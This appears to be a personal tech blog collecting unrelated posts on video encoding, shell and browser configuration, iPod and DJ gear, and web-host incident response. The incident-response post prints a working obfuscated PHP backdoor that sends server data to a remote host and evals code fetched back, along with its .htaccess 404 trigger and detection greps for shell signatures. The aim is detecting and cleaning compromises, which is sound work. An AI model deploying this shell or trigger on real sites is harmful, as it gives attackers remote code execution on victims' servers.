This will convert *.MTS movies recorded with the highest-quality settings from a Panasonic HDC-SD5 to an mpeg4 without losing any quality.
ffmpeg -i "${1}" -b 12710k -ac 2 -ab 256k -deinterlace -s 1920x1080 "${1}".avi
A common backdoor once a host is compromised is to create or append to existing .htaccess files a 404 redirect which will open a remote shell to a control server when the .php is hit, usually due to legitimate crawling. Attackers will intentionally backlink to nonexistent url’s on the compromised host so that Google et al will do the job of opening a remote shell to their control node. A symptom of this is a spike in load and the amount of connections in the WAITING state when being crawled.
The pair of .htaccess and .php is usually generated into every single folder with unique filenames. The filename of the php shell is usually a 4-6 character number but will sometimes be a reused dictionary regex. The .htaccess always contains string “ErrorDocument 404 //” with two forward slashes leading the filename. The .htaccess is usually less than 200 bytes:
Options -MultiViews
ErrorDocument 404 //wp-content/upload/2008/11/12433.php
There is little variation in the php number shell; usually the payload and destination. A common file size is 1474 bytes and a common string is ‘aHR0cDov’ which is the base-64 encoding of ‘http:/’.
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z=”/?”.base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($d).”.”.base64_encode($e).”.”.base64_encode($f).”.”.base64_encode($g).”.”.base64_encode($h).”.e.”.base64_encode($i).”.”.base64_encode($j);$f=base64_decode(“cGhwc2VhcmNoLmNu”);if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])==”a23ab92502c0050082dd96a32c754520″) $f=$_REQUEST["id"];if((include(base64_decode(“aHR0cDovL2FkczIu”).$f.$z)));else if($c=file_get_contents(base64_decode(“aHR0cDovLzcu”).$f.$z))eval($c);else{$cu=curl_init(base64_decode(“aHR0cDovLzcxLg==”).$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
Dolphin ver in inc/header.inc.php
Drupal version in modules/drupal/drupal.info
gallery2 setGalleryVersion in modules/core/module.inc
Joomla RELEASE in libraries/joomla/version.php
Movable Type version in mt-check.cgi
osCommerce PROJECT_VERSION in includes/application_top.php
phpBB PHPBB_VERSION in includes/constants.php
phpnuke mysql> SELECT Version_Num FROM nuke_config;
phpwcms version in include/inc_lib/default.inc.php
smf index.php
tikiwiki ./tiki-admin_security.php: 7=>’1.9.5′
VtigerCRM vtiger_current_version in vtigerversion.php
Wordpress wp-version in wp-includes/version.php
xcart /VERSION
Zen Cart ./includes/version.php
This will allow a classic XBOX to play 1280×720 video and should work for anything you can throw at mencoder.
subtitletracks=`mkvinfo "${1}" | fgrep "Track type: subtitles" -b2 | fgrep "Track number:" | awk '{print $NF}' | xargs`;
echo "Found subtitle tracks: ${subtitletracks}";
if [ `echo ${subtitletracks} | wc -w` -gt 1 ]; then
for i in ${subtitletracks};
do
mkvextract tracks "${1}" ${i}:"$1".avi.srt.${i};
done;
cp -i -a "${1}".avi.srt.`echo ${subtitletracks} | cut -d " " -f1` "${1}".avi.srt;
else
mkvextract tracks "${1}" ${subtitletracks}:"${1}".avi.srt;
fi;
echo "Finished extracting subtitle tracks for ${1}. Now encoding video.";
nice -n 19 ionice -c3 mencoder "${1}" -o "${1}".avi -oac copy -ovc lavc -lavcopts vcodec=mpeg4:vbitrate=4000:vrc_maxrate=5000:vrc_buf_size=4096;
echo "Finished encoding video for ${1}. Exit status was: ${?}";
unset subtitletracks
If you have already removed /var/lib/rpm/__db* and rpm –vv –rebuilddb (or strace) shows it is stuck on /var/lib/rpm/Packages but you are not able to salvage Packages due to db_dump and db_load being unavailable you can move Packages out of the way, –rebuilddb, restore the old Packages, and –rebuilddb again. rpm should then function correctly.
To locate a suspicious process’s (httpd, sendmail, perl) current working directory look in /proc/$PID/cwd
If httpd fullstatus isn’t available, you can use this to enumerate the current working directories of httpd processes:
for i in `ps -elf | grep http | awk '{print $4}' | sort | uniq`; do ls -la /proc/$i/cwd ; done | awk '{print $11}'| grep -Ev ^$ | sort | uniq -c | sort -n
If you do not have mytop, mysqladmin, or access to the mysql console, you can use this to enumerate the file descriptors of the mysqld process:
ls -al /proc/`pidof mysqld`/fd/ | awk -F\> '{print $2}' | awk -F/ '{print $5}' | sort | uniq -c | sort -n
If you do not catch them quickly enough after spawning, malicious processes can reparent themselves under init so their cwd is reset. You can look in /tmp, /var/tmp, and /dev/shm for any clues, as well as reference the /proc/$PID timestamps in logs. You can always strace the suspicious process and see what files it has open with lsof and netstat.
To identify malicious files in a suspicious directory:
1. Scan their directory using maldet, which should finds most newer PHP and Perl shells. It likely won’t find older or custom payloads.
2. Scan their directory with clamav if there is time to spare. For our purpose there is fingerprint overlap with maldet but clamav has a larger database and may catch something.
3. Use the following for an audit against common shells and malicious files:
If they have gigs of files they may be a file dump. If they have only a few kilobytes it may be a new fraudulent account.
du -sh
Custom 404 redirects are not very common and are usually only found in the webroot’s .htaccess. A common attack is creating .htaccess files which 404 redirect to malicious files (usually a PHP shell with all-numeric filename) which connect to a remote server and open a shell.
find . -name .htaccess -print0 | xargs -0 fgrep ErrorDocument\ 404
These are search strings for common PHP shells. Note that intruders may use incorrect extensions to confuse you and prepend image file headers so that the malicious file is recognized as an image by file.
find . -iname \*php -print0 | xargs -0 grep -E 'c99_|c99shell|999sh|fx29_|fx29shell|r57_|r57shell|aHR0cDov'
Base64-encoded content should be scrutinized as a potential payload. Intruders will copy system file headers/templates from your software’s (eg: WordPress) installation and encode (gzinflate, base64, rot13) them to confuse you on whether they’re malicious code or legitimate footers which sometimes contain images.
find . -iname \*php -print0 | xargs -0 fgrep base64_
Files with 777 permissions are a security concern and should be investigated.
find . -perm 777 -type f
find . -perm 777 -type d
Files which are 000′d may have been disabled by the user or an administrator due to suspicious behavior.
find . -perm 000
Files owned by root hopefully are from an administrator forgetting to assign them proper ownership and not a privilege escalation.
find . -user root
Files owned by the http server may indicate access was gained through the customer’s software.
find . -user nobody -o -user apache
Files modified recently are of primary concern. For a thorough check run a second pass for ctime, as intruders are able to set their mtimes to past datetimes.
find . -mtime -1
find . -mtime +1 -mtime -10
find . -ctime -1
find . -ctime +1 -ctime -10
You can supplement your investigation by parsing the access-log of the suspected target for suspicious POST’s:
Referrers: cut -d " " -f11 access_log | sort | uniq -c | sort -n
Visitors: cut -d " " -f1 access_log | sort | uniq -c | sort -n
POSTs: fgrep POST access_log | fgrep -v " 404 " | cut -d " " -f7 | sort | uniq -c | sort -n
The error_log will have stderr output for injections and subsequent attempts to retrieve payloads from other servers, often using wget or curl.
grep -E 'wget|curl' error_log
Once you have filenames and their checksums and IP addresses, you can search other servers and their logs.
GUI is for the weak. Meet my window manager, GNU screen:
0. Build screen from source to fix the slowdown when scrolling in a vertical split.
1. This is my .screenrc with keyboard shortcuts and a nifty status bar. –help?
Control + Up: previous split screen
Control + Down: next split screen
Control + Left: previous screen window
Control + Right: next screen window
F1: kill current tab
F2: write paste buffer to file
F3: split horizontally
F4: split vertically
F5: remove single split
F6: remove all splits
F7: urlview pulls URL's from your current output, very useful
F8: new tab
F9: resize split +1 line
F10: resize split -1 line
2. Install screen_ssh.sh so your window title automatically renames to your ssh destination. To have the title revert after closing your shell follow this.
3. color = readability. Install color wrapper to colorize your terminal output. Alias man to use most as its pager. Use the following for a colorful prompt with $? in $2:
00:43:18 0 user@hostname:~/$
\[\033[1;36m\]\t\[\033[0m\] `LastExitValue=$?; if [ $LastExitValue = 0 ]; then echo \[\033[1\;32m\]$LastExitValue\[\033[0m\]; else echo \[\033[1\;31m\]$LastExitValue\[\033[0m\]; fi` \[\033[1;34m\]\u@\h\[\033[0m\]:\[\033[1;33m\]\w\[\033[0m\]\[\033[1;32m\]\$\[\033[0m\]
To remove color use: s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g
4. Yakuake is the best terminal emulator. Configure these shortcuts:
Shift + Left: previous shell
Shift + Right: next shell
F11: full screen
F12: drop down
F1,Close Tab,BrowserCloseTabOrWindow();
user_pref("keyconfig.main.xxx_key1_Close Tab", "][][VK_F1][BrowserCloseTabOrWindow();][chrome://browser/content/browser.xul");
F2,Find,gFindBar.onFindCommand();
user_pref("keyconfig.main.xxx_key1_Find", "][][VK_F2][gFindBar.onFindCommand();][chrome://browser/content/browser.xul");
F3,Previous Tab,gBrowser.mTabContainer.advanceSelectedTab(-1,true);
user_pref("keyconfig.main.xxx_key1_Previous Tab", "][][VK_F3][gBrowser.mTabContainer.advanceSelectedTab(-1,true);][chrome://browser/content/browser.xul");
F4,Next Tab,gBrowser.mTabContainer.advanceSelectedTab(1,true);
user_pref("keyconfig.main.xxx_key1_Next Tab", "][][VK_F4][gBrowser.mTabContainer.advanceSelectedTab(1,true);][chrome://browser/content/browser.xul");
F5,Reload (override cache),BrowserReloadSkipCache();
user_pref("keyconfig.main.xxx_key1_Reload (override cache)", "][][VK_F5][BrowserReloadSkipCache();][chrome://browser/content/browser.xul");
F6,Select Address Bar,openLocation();
user_pref("keyconfig.main.xxx_key1_Select Address Bar", "][][VK_F6][openLocation();][chrome://browser/content/browser.xul");
F7,Undo Close Tab,undoCloseTab();
user_pref("keyconfig.main.xxx_key1_Undo Close Tab", "][][VK_F7][undoCloseTab();][chrome://browser/content/browser.xul");
F8,New Tab,BrowserOpenTab();
user_pref("keyconfig.main.xxx_key1_New Tab", "][][VK_F8][BrowserOpenTab();][chrome://browser/content/browser.xul");
F9,Back,BrowserBack();
user_pref("keyconfig.main.xxx_key1_Back", "][][VK_F9][BrowserBack();][chrome://browser/content/browser.xul");
F10,Forward,BrowserForward();
user_pref("keyconfig.main.xxx_key1_Forward", "][][VK_F10][BrowserForward();][chrome://browser/content/browser.xul");
F11,Full Screen,BrowserFullScreen();
disable in about:config
accessibility.browsewithcaret
accessibility.browsewithcaret_shortcut.enabled
1. Make sure gcc and g++ versions match
2. Use vmware-any-any-update117-itpsycho.tar.bz2 if any-any-updated117d doesn’t work.
3. iocontrol.h s/168/138/ if needed
The first-generation iPod Shuffle offers superior sound quality in comparison to other digital audio players due to its SigmaTel STMP35xx chip having a push-pull headphone amp. Two transistors per channel instead of one result in a near-perfect square-wave rendering. Other single-capacitor audio players render it closer to a sine wave.
I have been so impressed by the sound quality and versatility of the first-generation Shuffle that I am on my seventh. Five replacements came under warranty from Apple within 48 hours. Apparently, the comfortable and useful lanyard does not imply jogging with it under your shirt. Sweat killed my first five – some within the same week. My sixth lived for over a year, outlasting its warranty before succumbing to the blinking light problem. Lucky number seven was sourced from an online acquaintance for less than what it would cost to drive to the Apple Store.
And it is this lucky Shuffle which has recently been set on fire. It was an honest accident involving an aerosol can as a makeshift flamethrower. Although scarred and stained, the Shuffle remains in active duty for my audio and pendrive needs. rebuild_db allows you to bypass the restrictive, bloated iTunes and simply drag files onto the Shuffle.
My headphones of choice are Skullcandy Ti‘s. They offer excellent sound quality for their price, are very comfortable, have an enticing warranty, and come in a stylish white.
Got an ssh account on a machine? Don’t waste time retrieving a file, editing it, and uploading it manually.
sshfs user@target:/directory /mnt/point
You can then edit the file locally and, when saved, will do so across the ssh pipe.
A week after the first engrish subtitles were released, I rewrote them into something more manageable. Some sites caught onto using my version, but today’s torrent still has the engrish .srt.
http://alexandrulazar.com/junk/articles/wrd-initiald-scr.srt
For electronic music:
Some of the best, most obscure albums.
2. http://www.themixingbowl.org/
Excellent livesets, latest Essential Mix and Mary Anne Hobbs.
3. http://www.trancetraffic.com
0-day trance, house, techno albums and vinyl rips.
DJ’ing is an expensive hobby.
The industry-standard 1200′s are a $400 investment and vinyl can be prohibitively expensive and inconvenient. CDJ’s, nevertheless being a source of free music, can cost upwards of $1000 and are the equivalent of choosing an automatic over a manual transmission in a sports car. A recent alternative is a Final Scratch/Serato Scratch Live system to allow you to incorporate a laptop into your setup, providing the complexity favored by Sasha while retaining the coolness of vinyl. While many may have an adequate laptop, finding an additional $500 to upgrade your vinyl isn’t always easy. After all, there is a limit to the amount of fluids you can legally sell per day.
A Serato Scratch Live setup will cost you around $480. The latest Final Scratch weighs in at $100 less on a good day. Final Scratch 1.0, which many purists prefer for its Linux-based software, can be had for less than $200. However, a Behringer BCD2000 can be had on eBay for only $100.
There is no sense in paying twice or three times as much for a USB sound card which does not offer a fraction of the functionality of the BCD2000. The BCD2000 is not only a USB sound card (channels: 2 input, 1 output, 1 headphone, 1 microphone,) but also a mixer and a MIDI controller. By itself, the BCD2000 is a powerful tool for use with Traktor, Ableton Live, or other software of your choice. Remember to add two $10 Serato Scratch Live vinyls and $50 for a license for the unpirateable djDecks software. Rounding upwards to include shipping, you have a powerful digital vinyl setup for $200 that puts the competition to shame.
Other reviews of the BCD2000 will tell you that its plastic build and light weight may be discouraging. It does feel like a quality-made product, but it is not particularly sturdy. Though it will accept being carted from a mate’s tag session to the occasional house party and back to your studio, it is not a DJM-600 and it should not be treated like one. The crossfader has little weight behind it and should not be slammed. It is often hard to tell when the knobs are zeroed, as there is only a slight click at zero and they are a plain plastic black with no highlights in the middle of the knob. These nitpicks are nullified by the laptop you will be using for track selection, as it will be displaying your equalizer as well. It is possible to connect any analog mixer to the BCD2000 so you can play rough, though you will have to creatively route the left channel to the master output and the right channel to the headphone output before inputting them into your analog mixer. Keep in mind that this will limit your desk real estate and increase cabling entanglement.
The aforementioned djDecks software is excellent. It allows MP3 transcoding using Final Scratch, MsPinky, VirtualDJ, Serato Scratch Live and Traktor Scratch records. All the features of the Serato software are available, plus much more: 3-band equalizer, echos and loops, and 2 simultaneous VST effects per deck. The BCD2000 has enough spare buttons to properly control the djDecks software without touching your laptop. Buttons can be assigned to control a simultaneous session of Ableton Live or Traktor, though I’d recommend a hefty laptop with a 2 ghz CPU and 1 gig of RAM.
Recent updates have made the software essentially bulletproof. Install Windows, install BCD2000 drivers, install djDecks, play. The BCD2000 drivers have a history of instability on lower-end laptops, which may require disabling the WiFi card, DVD drive, and further tweaking. Behringer may not be best known for the quality and reliability of their entry-level analog mixers, but this product has been out for over a year and is considered solid, as is the rest of their BCD line.
The BCD3000 is now available, though it is essentially a Mac-friendly BCD2000 in an oreo color scheme and not worth paying twice as much.